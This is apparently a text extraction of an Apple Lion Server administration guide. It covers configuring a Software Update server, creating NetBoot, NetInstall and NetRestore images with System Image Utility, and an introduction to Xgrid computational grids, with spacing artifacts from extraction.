Before you set up Software Update on your server, you must be familiar with your network configuration and you must meet the following requirements: Youre the server administrator. Youre familiar with network setup. You might also need to work with your networking staff to change network topologies, s witches, routers , and other network settings. Client computer requirements Macintos h computers running Mac OS X v10.5 or later that are networked to a server running Mac OS X Server v10.5 or later can
use Software Update to update Apple software. Network hardware requirements The type of network connections to use depends on the number of clients you expect to s erve software updates to: To provide regular updates to fewer than 10 clients , use 100-Mbit Ethernet. To provide regular updates to 1050 clients , use 100-Mbit s witched Ethernet. To provide regular updates to more than 50 clients, us e Gigabit Ethernet. These are estimates for the number of clients supported. Note: In Lion Server, Software Update operates across all network interfaces that TCP/IP is configured for. Capacity planning The number of client computers your server can support when acces sing Software Update depends on how your server is configured, when and how often your clients check for updates, the s ize of the updates, and a number of other factors. When planning for your server and network needs, cons ider these main factors: Ethernet speed: 100Base-T or faster connections are required for client computers and the server. As you add clients , you might need to increas e the s peed of the Ethernet connections of your server. Ideally you want to take advantage of the Gigabit Ethernet capacity built in to your Mac server hardware to connect to a Gigabit switch. From the s witch, connect Gigabit Ethernet or 100-Mbit Ethernet to each Macintosh client. Hard disk capacity and number of packages: Software Update packages can occupy considerable hard disk s pace on server volumes, depending on the size and configuration of the package and the number of packages being s tored. Number of Ethernet ports on the switch: Distributing Macintos h clients over multiple Ethernet ports on your switch offers a performance advantage. Each port mus t serve a distinct s egment. Number of Software Update servers on the network: You might want to provide different software updates to various groups of users. By configuring directory services you can offer different update s ervices by network or hardware type, each targeting a different Software Update s erver on the network. Note: You cant configure Software Update servers to talk to one another. Software Update storage Software updates can easily take a large amount of disk s pace over time and cause problems with sys tem resources . In a production environment, it is important to prevent the system disk from becoming full and causing ins tability. To eliminate the poss ibility of s oftware updates filling a volume, s ystem administrators normally limit the type of data being stored on the root partition and place data that could grow s ubs tantially in size on other partitions. For example, you could use an Xserve RAID to s tore software updates. By default, software updates are stored in the /var/db/s wupd/ folder. To s tore s oftware updates in another location, choose a different partition or volume in the Software Update General settings pane. Consider which Software Update packages to offer Before you set up Software Update, consider whether to provide all or only part of Apples s oftware updates . Your client computers might run application software that requires a s pecific version of Apple s oftware for the application to operate correctly. You can configure your Software Update server to serve only Software Update packages you approve. Restricting acces s to update packages might help prevent maintenance and compatibility problems with your computers. You can restrict client access in a Software Update s erver by disabling automatic mirror-and-enable functions in the General Settings pane. You manage specific updates in the Updates pane of the Software Update server. Organize your enterprise client computers You might have individuals, groups, or groups of computers with common needs for only a few software update packages, while others might need unrestricted access to all software updates. To provide varied acces s to s oftware update packages, you must s et up multiple Software Update s ervers. Use managed preferences to configure these computers to access a s pecific Software Update server. For more information about how to configure managed preferences for the Software Update server, see Workgroup Manager Help.
Softw are Update
Modify existing Software Update storage

Storing s oftware updates can take up large amounts of disk s pace. You can prevent the overloading of your disk by changing the default storage location of software updates from /var/db/s wupd/ folder to a partition or volume with a larger capacity.
1. Open Server Admin and connect to the s erver. 2. Open Server Admin and connect to the s erver. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. If Software Update is started, click the Stop Software Update button. 5. Click General. 6. Click Choose and select the location to store downloaded software updates. 7. Click Save. 8. (Optionally) If s oftware updates were previous ly downloaded, use Terminal to copy the default software update folder to the new location: $ sudo cp -p /private/var/db/swupd/html /Volumes/My_Volume/My_Software_Updates_Folder/ 9. Click the Start Software Update button to confirm the operation. 10. (Optionally) Us e Terminal to delete the previous storage location to reclaim startup volume s pace: $ sudo rm -rf /private/var/db/swupd/html
Softw are Update
Turn on Software Update

Before you can configure Software Update settings , you must turn on Software Update in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Services. 4. Select the Software Update checkbox. 5. Click Save.
Softw are Update
Configure Software Update general settings

You can us e the General settings to set sys tem update copy and enable s ettings, to remove obsolete updates , and to limit user bandwidth.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click Settings.
5. To limit client user bandwidth, select Limit user bandwidth for updates to and enter the maximum rate of update bandwidth per user. 6. From the pop-up menu, choose KB/second or MB/second. 7. Click Choose and select where the Software Update catalog and downloads will be s tored. The default location is /var/db/s wupd/. 8. To s pecify a port that s oftware updates are provided through, enter a port number in the Provide updates using port field. 9. To keep a copy of the software updates on your server, s elect Copy __ updates from Apple and choose from the following options. If you want all updates copied from the Apple update server, choose all in the pop-up menu. If you want only new updates copied from the Apple update server, choos e all new in the pop-up menu. 10. To immediately enable all s oftware updates for client users, s elect Automatically enable copied updates. Enabling this feature retrieves all Apple published catalog updates and dis ables deprecated s oftware packages that have a replacement package available. An adminis trator can disable the new software package and continue offering the deprecated package. If this feature is not selected and an administrator manually enables updates, disabling of deprecated software packages is performed as individual replacement packages are enabled. 11. To remove obs olete software updates from the Software Update storage location, s elect the Delete outdated software update packages checkbox. Enabling this feature does not remove obsolete or deprecated software updates from the local Software Update catalog. 12. Click Save.
Softw are Update
Configure Updates settings

You can us e Updates s ettings to refresh the software update catalog, to copy and enable individual updates, and to view specific update information. Downloading Apple updates disables deprecated software packages that have a replacement package available. An administrator can dis able the new s oftware package and continue offering the deprecated package. To configure Updates settings 1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click Updates. 5. Click the Refresh button to synchronize with the Apple server. An unscheduled synchronization does not change or delay the next scheduled s ynchronization operation, which occurs every 24 hours at 03:00 (local time) by default. An adminis trator can change the scheduled s ynchronization time by modifying the StartCalendarInterval > Hour value at /Sys tem/Library/LaunchDaemons/com.apple.swupdate.sync.plist. To res tore default launchd settings, remove the com.apple.swupdate.sync.plist file and restart Software Update. 6. Click Copy Now to copy software updates to your server. 7. Select the checkbox in the Enable column for each update you want to make available to client computers . The Enable column is dis abled if the Automatically enable copied updates checkbox is selected. To manually enable or disable updates, deselect this checkbox in the Settings pane.
8. Click Save.
Softw are Update
Start Software Update

Use Server Admin to start Software Update.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click the Start Software Update button (below the Servers lis t).
Softw are Update
Redirect your Software Update server

To load-balance the dis tribution of Software Update acros s multiple Software Update s ervers or to conserve bandwidth to the Internet, you can change the /etc/swupd/swupd.plist file to redirect where your Software Update server obtains software updates. By redirecting your Software Update server, you can have multiple Software Update servers on your private network. However, only one Software Update server needs acces s outside your private Intranet to obtain software updates from the Apple Software Update server. Then each additional server can access the internal server to obtain the software updates.
1. On the internal Software Update server, open Terminal. 2. Enter the following command: $ sudo vi /etc/swupd/swupd.plist 3. Locate the following metaIndexURL key: ... <key>metaIndexURL</key> <string>http://swscan.apple.com/content/meta/mirror-config-1.plist</string> 4. Change the URL in the tags <s tring></string> to the location of your s elected Software Update server. For example: <key>metaIndexURL</key> <string>http://myserver.example.com:8088/catalogs.sucatalog</string> 5. Save the changes and exit Terminal.
Softw are Update
Point unmanaged clients to a Software Update server

Lion Server provides the ability to publis h separate catalogs for specific vers ions of Mac OS X. This allows each client to view only the updates that relate to the operating system installed on that s ystem. Lion Server supports catalogs for Mac OS X v10.5 or later clients. If you are not using client management and are using Mac OS X v10.5, you can us e the defaults command in Terminal to point unmanaged client computers to a Software Update server. You must be an administrator to use the defaults command.
To point unmanaged clients to a Software Update server 1. Make a backup copy of the /Library/Preferences/com.apple.SoftwareUpdate.plist file, if it exists. 2. On the unmanaged client, open Terminal. 3. Enter the following command: $ sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CatalogURL URL Replace URL with the URL of the Software Update server, including the port number and the name of the catalog file for the specific version of Mac OS X. For example, for Mac OS X v10.5: http://su.domain_name.com:8088/index-leopard.merged-1.sucatalog You can verify your change us ing the following command: $ defaults read /Library/Preferences/com.apple.SoftwareUpdate CatalogURL To point the unmanaged client computer back to the Apple Software Update server, use the following command: $ sudo defaults delete /Library/Preferences/com.apple.SoftwareUpdate CatalogURL You can revert these changes by replacing the /Library/Preferences /com.apple.SoftwareUpdate.plis t file with the backup copy you made in step 1.
Softw are Update
Manage Softw are Update
Manually refresh the updates catalog from the Apple server

Use Server Admin to manually update the updates catalog. Note: Downloading Apple updates dis ables deprecated s oftware packages that have a replacement package available. An administrator can disable the new s oftware package and continue offering the deprecated package.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click Updates. 5. Click the Refresh button.
Softw are Update
Check the status of Software Update

Use Server Admin to check the s tatus of Software Update.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. To s ee whether the service is running, when it started, when it las t checked for updates , the number of updates that are copied or enabled, and whether auto-copy and auto-enable are turned on, click Overview. 5. To review the Software Update service log, click Log.
Softw are Update
Stop Software Update

Use Server Admin to stop Software Update.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click the Stop Software Update button (below the Servers lis t).
Softw are Update
Limit user bandwidth for Software Update

Use Server Admin to limit user bandwidth.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click General. 5. Select Limit user bandwidth for updates to. 6. Enter the maximum rate of update bandwidth per user. 7. From the pop-up menu, choose KB/second or MB/second. 8. Click Save.
Softw are Update
Limit Software Update server bandwidth

A new feature in Lion Server Software Update s erver is the syncBandwidth. This feature can be used to limit the Software Update server's bandwidth back to Apple. Similar to the user bandwidth limit setting, it's value is expressed in KBytes/second (for example, 1024 = 1048576 Bytes/second). A value of zero dis ables the feature and allows syncing to occur at the maximum bandwidth of the server and WAN connection. The syncBandwidth setting can be us ed to minimize impact the of Software Update server where organizations may have limited external bandwidth. This setting is not supported in the Server Admin, but can be acces sed us ing the serveradmin command line tool:
To set the Software Update server's bandwidth: $ sudo serveradmin settings swupdate:syncBandwith = 1024 Note: This value s ets an average rate limit and instantaneous transfer rates may slightly exceed the cap for short durations.
Softw are Update
Automatically copy and enable updates from Apple
Use Server Admin to copy and enable software updates automatically from Apple. Enabling this feature retrieves all Apple published catalog updates and disables deprecated software packages that have a replacement package available. An administrator can disable the new software package and continue offering the deprecated package. If this feature is not selected and an administrator manually enables updates, dis abling of deprecated software packages is performed as individual replacement packages are enabled.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click General. 5. Select Copy __ updates from Apple and choose from the pop-up menu: If you want all updates copied from the Apple update server, choose all. If you want only new updates copied from the Apple update server, choos e all new. 6. Select Automatically enable copied updates. 7. Click Save.
Softw are Update
Copy and enable selected updates from Apple

Use Server Admin to copy selected software updates automatically from Apple. Downloading Apple updates disables deprecated software packages that have a replacement package available. An administrator can dis able the new s oftware package and continue offering the deprecated package.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click General. 5. Make sure Copy __ updates from Apple is deselected. 6. Make sure Automatically enable copied updates is des elected. 7. Click Save. 8. Click Updates. 9. Click Copy Now to copy software updates to your server. This copies software updates to your server. 10. To enable individual s oftware updates , select the checkbox in the Enable column of the update. 11. Click Save.
Softw are Update
Remove obsolete software updates

Use Server Admin to remove obsolete s oftware updates from packages stored on the server. You can configure Software Update to automatically purge obsolete updates.
Enabling this feature does not remove obsolete or deprecated software updates from the local Software Update catalog.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click General. 5. Select the Delete outdated software update packages checkbox. 6. Click Save.
Softw are Update
Identify individual software update files

Software updates are stored in the /var/db/s wupd/ folder by default. Sometimes you might want to locate a specific s oftware update file. Each s oftware update that is copied to the server is stored with product ID numbers for a file name. To make sure you are s electing the correct software update file, correlate the file name (product ID) with the software update product ID in Server Admin. Each software update lis ts their product ID below the des cription field in the Updates Settings pane of Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Software Update. 4. Click Updates. 5. Select the software update from the lis t. The software update product ID is displayed below the description field.
Softw are Update
Solv e Softw are Update problems
General solutions to Software Update problems

Make s ure required services are ins talled. Make s ure the Software Update packages you enable are meant for the client access ing them. If you detect poor response from the Software Update server, check the network load. For more information, see Cons iderations and requirements . Delete old updates to make space for new ones. If Software Update update packages aren't visible to client computers Make sure the packages are enabled in Server Admin. If the Software Update server won't sync with the Apple server Make sure the Apple server is acces sible. If a client computer can't access the Software Update server Make s ure the client can acces s the network. Make s ure the clients Software Update managed preference points to the Software Update server. Make s ure the Software Update server is running.
System Image Utility
Get started
About System Image Utility

The NetBoot, NetIns tall, and NetRes tore features of Mac OS X offer you alternatives for managing the operating system and application s oftware that your Macintosh clients (or even other s ervers) require to start and do their work. Instead of going from computer to computer to install operating sys tem and application s oftware from CDs, you can prepare an installation image that installs on each computer when it starts up. You can als o choose to not install software and have client computers start up (or boot) from an image stored on the s erver. (In some cases , clients dont even need their own hard disk.) Using NetBoot and NetInstall, your client computers can s tart from a standardized Mac OS configuration suited to specific tasks. Because the client computers start from the same image, you can quickly update the operating system for users by updating a single boot image. NetBoot requires a boot image. NetInstall requires an installation image. A b oot image (.dmg file) is a file that looks and acts like a mountable dis k or volume. NetBoot images contain the sys tem software needed to act as a startup disk for client computers over the network. An installation image (.nbi folder) is an image that starts up the client computer long enough to install s oftware from the image. The client can then start up from its own hard dis k. Boot images and installation images are disk images . The main difference is that a .dmg file is a proper dis k image and a .nbi folder is a bootable network volume (which contains a .dmg dis k image file). Disk images are files that behave like disk volumes. You can set up multiple NetBoot or NetInstall images to suit the needs of groups of clients or you can provide copies of the same image on multiple NetBoot servers to distribute the client startup load. You can also us e a NetRestore image to quickly restore a volume. NetBoot service can be used with NetBoot and NetInstall images along with Mac OS X client management services to provide a personalized work environment for each us er. Application for setting up and managing images You use the following Lion Server applications to s et up and manage NetBoot, NetInstall, and NetRestore: Sys tem Image Utility, to create Mac OS X Lion NetBoot, NetInstall, and NetRes tore disk images. This utility is ins talled with Lion Server software in the /Applications/Server/ folder. Server Admin, to enable and configure NetBoot s ervice and supporting s ervices . You can download Server Admin Tools at http://support.apple.com/downloads /. The Server Admin Tools are installed in the /Applications/Server/ folder. PackageMaker, to create package files you use to add s oftware to disk images. Property List Editor, to edit property lis ts s uch as NBImageInfo.plist. Note: To create an image, you must have valid Mac OS X Lion image sources or volumes. You cannot create an image of the startup disk you are running on.
Get started
Create NetBoot images

You can create NetBoot images of Mac OS X that you can then us e to s tart client computers over the network. You can also assemble a workflow to create a NetBoot image that permits advanced customization of your images. For more information, see About workflows. You mus t purchas e a Mac OS X user licens e for each client that s tarts from a NetBoot or NetInstall disk image.
1. Log in as an administrator us er. 2. Open Sys tem Image Utility (in the /Applications/Server/ folder). 3. In the left sidebar, select the image source. If no image s ources are listed, mount a valid Mac OS X Lion installation image or a valid Mac OS X Lion boot volume. To create an image, you must have valid Mac OS X Lion image sources or volumes. If you download Mac OS X Lion install
as sistant from the App Store and ins tall it, a valid Mac OS X Lion image s ource appears in the source list. You cannot create an image of the startup disk you are running on. 4. Select NetBoot Image and click Continue. 5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Dis k preferences pane on client computers . 6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients cant see the description information. 7. If the image is served from more than one s erver, s elect the checkbox below the description field. This option generates an index ID for NetBoot s erver load balancing. 8. Click Create. 9. In the Save As dialog, choose where to save the image. If NetBoot s ervice is configured on a network port and Server Admin is set to serve images from a volume, the Netboot service share point folder NetBootSPn appears in the pop-up menu. Important: Do not attempt to edit content in the image des tination folder while the image is being created.
Get started
Create NetInstall images

Use System Image Utility to create a NetIns tall image that you can use to install s oftware on client computers over the network. You can find this application in the /Applications /Server/ folder. To create an image, you mus t have valid Mac OS X Lion image sources or volumes . If you download Mac OS X Lion install ass is tant from the App Store and install it, a valid Mac OS X Lion image source appears in the source list. You cannot create an image of the startup dis k you are running on.
1. Log in as an administrator us er. 2. Open Sys tem Image Utility (in the /Applications/Server/ folder). 3. In the left sidebar, select the image source. 4. Select NetIns tall Image and click Continue. 5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Dis k preferences pane on client computers . 6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients cant see the description information. 7. If the image is served from more than one s erver, s elect the checkbox below the description field. This assigns an index ID to the image for NetBoot service load balancing. 8. Click Create. 9. In the Save As dialog, choose where to save the image. If you dont want to use the image name you entered earlier, change it by entering a name in the Save As field. If youre creating the image on the same s erver that will serve it, choose a volume from the Serve from NetBoot share point on pop-up menu. For this option to appear in the pop-up menu, NetBoot service must be configured on a network port and Server Admin must be s et to serve images from a volume. To s ave the image s omewhere els e, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder.
Important: Do not attempt to edit content in the image des tination folder while the image is being created.
Get started
Create NetRestore images

If you have a client computer thats already configured, you can use System Image Utility to create a NetRestore image based on that client configuration. You can create a NetRestore image of a Mac OS X Lion volume that is used to restore client computers over the network using NetBoot service or Apple Software Recovery asr tool. When you create a NetRestore image, you are creating a clone of a volume. You can also use the asr tool to res tore a s ystem image onto a volume or to clone volumes. If you have multiple client computers to res tore, you can use asr to retore them s imultaneous ly. You mus t start up from a volume other than the one youre using as the image source. For example, you could s tart up from an external FireWire hard disk or a second partition on the client computer hard dis k. You cant create the image on a volume over the network. You can also assemble a workflow to create a NetRes tore image that permits advanced cus tomization of your images. For more information, see About workflows. To create an image, you mus t have valid Mac OS X Lion image sources or volumes . If you download Mac OS X Lion install ass is tant from the App Store and install it, a valid Mac OS X Lion image source appears in the source list. You cannot create an image of the startup dis k you are running on.
1. Log in as an administrator us er. 2. Open Sys tem Image Utility (in the /Applications/Server/ folder). 3. In the left sidebar, select the image source. If no image s ources are listed, mount a valid Mac OS X Lion installation image or a valid Mac OS X Lion boot volume. 4. Select NetRestore Image and click Continue. 5. In the Network Disk field, enter a name for your image. This name identifies the image in the Startup Disk preferences pane on client computers . 6. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients cant see the description information. 7. If the image is served from more than one s erver, s elect the checkbox below the description field. This assigns an index ID to the image for NetBoot service load balancing. 8. Click Create. 9. In the Save As dialog, choose where to save the image. If you dont want to use the image name you entered earlier, change it by entering a name in the Save As field. If youre creating the image on the same s erver that will serve it, choose a volume from the Serve from NetBoot share point on pop-up menu. For this option to appear in the pop-up menu, NetBoot service must be configured on a network port and Server Admin must be s et to serve images from a volume. To s ave the image s omewhere els e, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder. 10. Click Save and authenticate if prompted. Important: Do not attempt to edit content in the image des tination folder while the image is being created.
Get started
Create an image from a configured computer

If a client computer is configured, you can use System Image Utility to create a NetBoot or NetInstall image based on that client configuration. You mus t start up from a volume other than the one youre using as the image source. For example, you could s tart up from an external FireWire hard disk or a second partition on the client computer hard dis k. You cant create the image on a volume over the network. To create an image, you mus t have valid Mac OS X Lion image sources (volumes or installation image). You cannot create an image of the startup dis k you are running on.
1. Start up the computer from a partition other than the one youre imaging. 2. Install System Image Utility on the client computer. 3. Open Sys tem Image Utility on the client computer (in the /Applications/Server/ folder). 4. In the left sidebar, select the image source. 5. From the expanded lis t, select the image source. 6. Select the type of image you want to create and click Continue: If your client computers will start up from this image, select NetBoot. If your image will be installed on a hard disk, Select NetInstall. If your image is a clone of a volume, Select NetRes tore. 7. In the Image Name field, enter a name for your image. This name identifies the image in the Startup Dis k preferences pane on client computers . 8. (Optional) In the Description field, enter notes or other information to help you characterize the image. Clients cant see the description information. 9. If the image is served from more than one s erver, s elect the checkbox below the description field. This option generates an index ID for NetBoot s erver load balancing. 10. For NetBoot images, if your source volume is a Mac OS X Lion Ins tallation image, enter a user name, short name, and password (in the Password and Verify fields ) for the administrator account in Create Adminis trator Account. You can log in to a booted client us ing this account. 11. Click Create. 12. In the Save As dialog, choose where to save the image. If you dont want to use the image name you entered earlier, change it by entering a name in the Save As field. To s ave the image s omewhere els e, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder. 13. Click Save and authenticate if prompted. Important: Do not attempt to edit content in the image destination folder while the image is being created. 14. After the image is created on the client computer, copy it to the /Library/NetBoot/NetBootSPn share point on the server for use by NetBoot service. Images s hould be stored in this folder.
Workflow s
About workflows
Sys tem Image Utility harnesses the power of Automator to help you create custom images by ass embling workflows. The basic building block of a workflow is an automator action. You define the image customization by assembling automator actions into a
workflow. Instead of being a do-it-all tool, an action is purpos e-designed to perform a single task well. By combining several actions into a workflow, you can quickly accomplis h a specific task that no one action can accomplish on its own. Each action performs a single task, such as customizing a software package or adding a us er account. You use workflows to create customized NetInstall or NetBoot images depending on the goals of your task: Workflows that create custom NetInstall images ass emble an image that installs the OS onto the computer, either originating from installation DVDs or from an installed OS volume. This image boots into the ins taller environment or similar shell environment and performs the workflow s teps you define. Workflows that create custom NetBoot images assemble a bootable image from installation DVDs or from an installed OS volume. This image can be directly installed onto a target volume using the asr command-line tool or NetBoot. For more information, s ee As semble workflows.
Workflow s
Assemble workflows
To as semble a workflow from a set of actions, drag and drop the actions from the Automator Library in the sequence you want them to run. Each action in the workflow corresponds to a step you must perform manually. Each action has options and settings you can configure. System Image Utility connects these action components with the types of data that are flowing from one action to another. You can save your assembled workflows to reuse later.
Workflow s
Add workflows
You can update or modify workflows by adding them to System Image Utility.
1. Open Sys tem Image Utility. 2. Click the Add button (+) and s elect Add Existing Workflow. 3. Select the workflow to add to System Image Utility. Workflows have the .workflow file extens ion. 4. Click Open.
Workflow s
Remove workflows
You can remove workflows from Sys tem Image Utility.
1. Log in as an administrator us er and open System Image Utility. 2. In the left sidebar, click the triangle next to Workflows. The list of workflows appears . 3. Select the workflow to remove and click File > Remove Workflow. 4. Click Remove to confirm the action. The workflow is removed from System Image Utility but is not deleted from your computer.
Workflow s
Assemble an image workflow

Use image workflows to create Mac OS X Lion NetBoot and NetInstall images . Workflows let you manually define the contents of your image in System Image Utility. An image workflow must start with the Define Image Source action and end with the Create Image action. Also, actions in a workflow must be connected. If not, the workflow is invalid and the actions are not proces sed.
1. Log in as an administrator us er. 2. Open Sys tem Image Utility (in the /Applications/Server/ folder). 3. In the image source list, click the triangle at the left of Sources . The list of s ources appears . 4. From the expanded lis t, select the image source. When you select the s ource, this action chooses a default image type based on the contents of the selected source. 5. Choose which type of image you are creating (NetIns tall, NetBoot, or NetRes tore image). 6. Click Cus tomize for advanced image creation options. This opens the workflow pane and Automator Library. The Define Image Source action is present as the first component in the workflow. 7. Configure the Define Image Source action for your image. This action is required at the beginning of all image workflows . See Configure the Define Image Source action. 8. From Automator Library, choose additional actions that your cus tomized image requires and drag them into the Workflow pane between the Define Image Source action and the Create Image action. 9. As semble the actions in the order you like, configuring each action as you go. For more information on configuring the actions , see About workflows. 10. Add the Create Image action to the end of your workflow. This action is required at the end of image workflows . See Configure the Create Image action. 11. Save the workflow by clicking Save, then enter the name of your workflow in the Save As field and choose where to save the workflow. To s ave the workflow somewhere else, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder. 12. Click Save. 13. To s tart the workflow, click Run and authenticate if prompted. Important: Do not attempt to edit content in the image destination folder while the image is being created.
Workflow s
Use automator to run a workflow

You can us e the automator command-line tool to run a workflow.
The following command runs a workflow with somevariab le set to somevalue in the myworkflow.workflow file. $ automator -D somevariable=somevalue myworkflow.workflow For more information, s ee the automator man pages .
Xgrid
About Xgrid and computational grids

Xgrid makes it easy to turn an ad hoc group of Mac computers into a low-cost supercomputer. Xgrid is ideal for individual researchers, s pecialized collaborators, and application developers . For example: Scientists can search biological databases on a cluster of Xs erve systems. Engineers can perform finite element analyses on their workgroups desktops. Animators can render images using Mac systems across multiple corporate locations. Research teams can enlist colleagues and interested laypeople in Internet-scale volunteer grids to perform long-running scientific calculations . Anyone needing to perform CPU-intensive calculations can simultaneously run a single job acros s multiple computers, dramatically improving throughput and responsivenes s. With Xgrid functionality integrated into Lion Server, system administrators can quickly enable Xgrid on Macs throughout their company, turning idle CPU cycles into a productive cluster at no incremental cost. Many desktop computers s it idle during the day, in the evening, and on weekends . The assembly of these systems into a computational grid is known as desktop recovery. This method of grid construction enables you to vastly improve your computational capacity without purchasing extra hardware, and Xgrid makes the software configuration a s traightforward task. For a server to function as a controller, Xgrid requires Mac OS X Server v10.4 with a minimum of 256 MB of RAM or Mac OS X Server v10.5 or later, with 1 GB of RAM. To operate as an agent in a grid, Xgrid requires Mac OS X v10.3 or later with a minimum of 128 MB of RAM (256 MB advis able) or Mac OS X v10.4 or later, with 512 MB or RAM. All Xgrid participants must have a network connection. As always, the more RAM a s ystem has, the better it performs , es pecially for high-performance computing applications. A grid is a group of computers working together to solve a s ingle problem. The systems in a grid can be loos ely coupled, geographically dis persed and, to some extent, heterogeneous. In contrast, systems in a cluster are often homogeneous, colocated, and s trictly managed. Highly dispers ed grids, such as SETI@Home, enable individuals to donate their spare process or cycles to a cause. In office environments, large rendering or simulation jobs can be distributed acros s sys tems left idle overnight. Thes e can even be used to augment a dedicated computational cluster, which is available to Xgrid clients at all times. Xgrid has no limitations on the amount of computational power it can s upport. The performance of the grid depends on the systems participating, the software running, and the network, among other factors. However, individual applications strongly influence the performance of the grid. You determine if an application is improved by being deployed on a computational grid. In the bes t case, application performance might s cale linearly with the size of the grid. In the worst cas e, the addition of agents to a grid can cause a job to be completed in even more time than if there were fewer agents . (In s uch a situation, tasks become s o small that the overhead associated with distributing the increased number of tas ks supersedes the performance gain of us ing more agents.) Be aware of these considerations. Many proprietary projects enable you to participate in a large computational grid. Often these projects, s uch as SETI@Home and FightAIDS@Home, are tied to a specific scientific purpose. They us ually have eas y-to-ins tall software that enables any volunteer to participate in that project, and they frequently take the form of a screen saver or background process. You dont need to think in terms of thousands or millions of seldom-us ed computers to see the significance of a computational grid. For example, computers us ed by university students or corporate employees often work fewer hours than the hours they sit idle at night or on weekends. Thes e computers could contribute productively to the work of a grid without diminis hing their usefulness to the students or employees. Other grid projects are designed for large-s cale computational grids, s uch as the Globus Alliance (a group founded by universities and researchers), with flexible resource management tools and more intelligent grid deployment methods . Instead of developing neatly packaged applications for a s pecific grid, such projects provide comprehens ive frameworks for application deployment. Xgrid enables users to participate in a computational grid of their choice while s till providing the flexibility of a more generic framework for grid developers when deploying grid applications. Xgrid provides the primary benefits of both: Easy grid configuration and deployment Straightforward yet flexible job submis sion Automatic controller dis covery by agents and clients
Flexible architecture based on open s tandards Support for the UNIX security model, including Kerberos s ingle sign-on or regular password authentication Choice between a command-line interface or an API-based model for grid interaction Common types of grids and grid computing styles Xgrid can be used in tightly coupled clusters, worldwide grids , and everything in between. This immens e flexibility enables you to deploy grids of almos t any nature. Three topologies are commonly used for Xgrid deployments.
Xgrid clusters
Computational clusters are s ets of systems dedicated to computation. In a clus ter, sys tems are typically colocated in a rack, connected using gigabit Ethernet or another high-performance network, and s trictly managed for maximum performance. Cluster s ystems are often entirely homogeneous : their operating sys tems are the s ame versions, they have the same software installed, and they generally have the same process or, disk, and RAM configurations. Xgrid enables administrators to eas ily configure the distributed res ource management functionality of the cluster. Each server in the system runs the agent software, and the head node in the cluster runs the controller software. Xgrid distributes tas ks across the cluster. In clus ters , failure rates are generally very low. Systems are rarely, if ever, offline, and their resources are not shared with general user tas ks. Clusters are the most efficient but most expensive model of dis tributed computing.
Local grids
Sys tems that are under common adminis tration in a company, univers ity computer lab, or other managed environment can often be easily assembled into a grid for desktop recovery. These s ystems are often on a local area network (LAN) and they are generally managed by a single organization. As a result, they provide good network performance and offer substantial manageability. Because these systems are often also used as day-to-day works tations, users can easily interrupt grid tas ks by moving the mous e, resetting the system, or even accidentally disconnecting the system from the network. In such cases , a task might fail as part of an Xgrid job. The Xgrid controller eventually reass igns the failed tas k to another agent, and the job completes s uccessfully. In local grids , performance is limited by such situations and by the varying performance of any given agent on the grid.
Distributed grids
When a system is permitted to donate its time, a distributed grid is formed. The Xgrid agent enables a user to specify any IP addres s or host name for its controller. By specifying a grid, a user can dedicate his or her CPU time to that grid no matter where the controller is located. The manager of the controller has no direct management control or knowledge of the agent system but is nonetheles s able to harness its CPU time. Distributed grids have very high failure rates for jobs but place a very low burden for the grid administrator. With very, very large jobs, high task failure rates might not substantially affect the performance of the grid if such failures can be rapidly reassigned to other available agents. Network performance can also be a consideration because data is s ent over the Internet, rather than over a local network, to agents connected to a grid. The monetary cost of s uch dis tributed grids is extremely low.
Xgrid
Xgrid components
The Xgrid three-tier architecture simplifies the distribution of complicated tasks. Its user clients, grid controllers, and computational agents work together to s treamline the process of assembling nodes, submitting jobs, and retrieving res ults . The primary components of a computational grid perform the following functions: An agent runs one task at a time per CPU; therefore, a multiproces sor computer can run multiple tasks s imultaneously. A controller queues tasks , distributes those tasks to agents , and handles task reass ignment.
Animators can render images using Mac systems across multiple corporate locations. A client s ubmits jobs to the Xgrid controller in the form of multiple tas ks. (A client can be any computer running Mac OS X v10.4 or later or Mac OS X Server v10.4 or later.) In principle, the agent, controller, and client can run on the s ame server, but it is often more efficient to have a dedicated controller node.
Client
Any sys tem can be an Xgrid client if it is running Mac OS X v10.4 or later and has a network connection to the Xgrid controller system. In general, the client can connect to only a single controller. Depending on how a controller is configured, the client mus t supply a password or be authenticated by Kerberos (single sign-on) before submitting a job to the grid. A user submits a job to the controller from a system running the Xgrid client software, usually a command-line tool acces sed with the Terminal application. The job can specify the controller or use multicast DNS (mDNS) to dynamically discover the first available controller. When the job is complete, the controller notifies the client and the client can retrieve the results of the job.
Controller
